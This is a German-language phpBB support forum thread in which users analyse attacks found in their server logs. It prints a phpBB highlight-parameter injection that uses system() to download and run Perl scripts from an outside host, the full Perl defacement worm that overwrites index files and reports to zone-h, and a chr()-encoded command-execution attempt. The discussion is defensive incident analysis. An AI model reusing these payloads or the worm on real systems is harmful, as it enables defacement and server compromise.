neue Wurmform?

[albe]

Ich hatte heute einen neuen Angriff:

Code: Alles auswählen

/phpBB2/viewtopic.php?t=376&highlight=\'.system(\'ls%09/;cd%09/tmp;wget%09www.spykids.info/po.txt;perl%09po.txt;wget%09www.spykids.info/putz.1.txt;perl%09putz.1.txt\').\'

und dieses Skript wurd dann aufgerufen:

Code: Alles auswählen

#!/usr/bin/perl

$arquivo = $0;

my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);


use IO::Socket::INET;

`find / -name index.* >> bah`;

open(a,"<bah");
@dir = <a>;
close(a);

$b = scalar(@dir);

for($a=0;$a<=$b;$a++)
{
chomp $dir[$a];
system("echo spykids spykids > $dir[$a]");
}

`locate httpd.conf >> porra`;
open(a,"<porra");
@po = <a>;
close(a);
foreach $po (@po){
chomp $po;
`cat $po |grep ServerName >> bah1`;
}
open(a,"<bah1");
@site = <a>;
close(a);

$b = scalar(@site);

for($a=0;$a<=$b;$a++)
{
chomp $site[$a];
$site[$a] =~ s/#//g;
$site[$a] =~ s/servername//g;
$site[$a] =~ s/ServerName//g;
$site[$a] =~ s/ //g;

$sock = IO::Socket::INET->new(PeerAddr => $site[$a], PeerPort => 80, Proto => "tcp") or next;
print $sock "GET / HTTP/1.0\n\n";
@ow = <$sock>;
close($sock);
$ae = "";
$ae = "@ow";
if($ae =~/spykids/){
print "$site[$a]\n";
$sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or die "nao conectou";
print $sock "POST /en/defacements/notify HTTP/1.0\r\n";
print $sock "Accept: */*\r\n";
print $sock "Referer: http://www.zone-h.org/en/defacements/notify\r\n";
print $sock "Accept-Language: pt-br\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
print $sock "Host: www.zone-h.org\r\n";
print $sock "Content-Length: 385\r\n";
print $sock "Pragma: no-cache\r\n";
print $sock "\r\n";
print $sock "notify_defacer=SpyKids&notify_domain=http%3A%2F%2F$site[$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n";

close($sock);
}
}
system("rm -rf $arquivo");

Weiss jemand von Euch was dieses Skript bezweckt?

[kellanved]

Sieht aus wie ein modifizierter Santy. Allerdings sucht er nicht nach anderen phpBBs, sondern meldet den Erfolg an eine Defacement-Seite. Die Details sind mir im Moment zu anstrengend (Portugiesisch + Perl...)

Es wurde auch noch dieses Script gestartet (sieht wie ein IRC Bot aus):

http://www.spykids.info/po.txt

[albe]

Ich habe nun meine htaccess entsprechend angepasst. Bei Eingabe des Codes wird der Angreifer nun weitergeleitet....

[kellanved]

eine andere Frage: war der Angriff erfolgreich?
Falls ja, empfielt sich eine gründliche Reinigung des tmp- Verzeichnisses und ein Neustart des Servers, um den IRC-Spybot los zu werden.

[albe]

Hallo,

nein war nicht erfolgreich, der Angriff wurde abgeblockt. Ich habe u.a. den CBACK CrackerTracker drauf.

Was ist ein IRC-Spybot? Was macht der?

[kellanved]

Ein Programm welches es erlaubt den Server über IRC fernzusteuern. Etwa um andere Rechner zu hacken oder DOS-Attacken zu starten.

[Basilisk]

Hallo,

Also mein Virenscanner "Nod32" erkennt deine Textdatei als :
Trojan Unix Shell/bot.A

KAV sagt dazu: Backdoor.Perl.Shellbot.o


Ich würde sie vom Netz nehmen



Grüsse
Basilisk

[kellanved]

Wenn sich das auf den Link weiter oben bezieht: das ist nur aus dem Post von albe herausgeschnitten. Die Datei liegt auf dem Server der Hacker.

[Jürgen H.]

Hallo,

Code: Alles auswählen

t=9955&highlight=%27.printf(chr(60).chr(103).chr(48).chr(62)).system(chr(105).chr(100)).printf(chr(60).chr(47).chr(103).chr(48).chr(62)).%27 

209.95.20.2 Python-urllib/2.1

Was war das denn ?
Hatte ich noch nie im Logfile...

Lg
Jürgen

[kellanved]

Das hier:

Code: Alles auswählen

<g0>id</g0>

Das ist ein Versuch den 2.0.15er Exploit auszunutzen. Ausserdem ein schönes Beispiel, warum Security Mod und Konsorten nicht funktionieren können.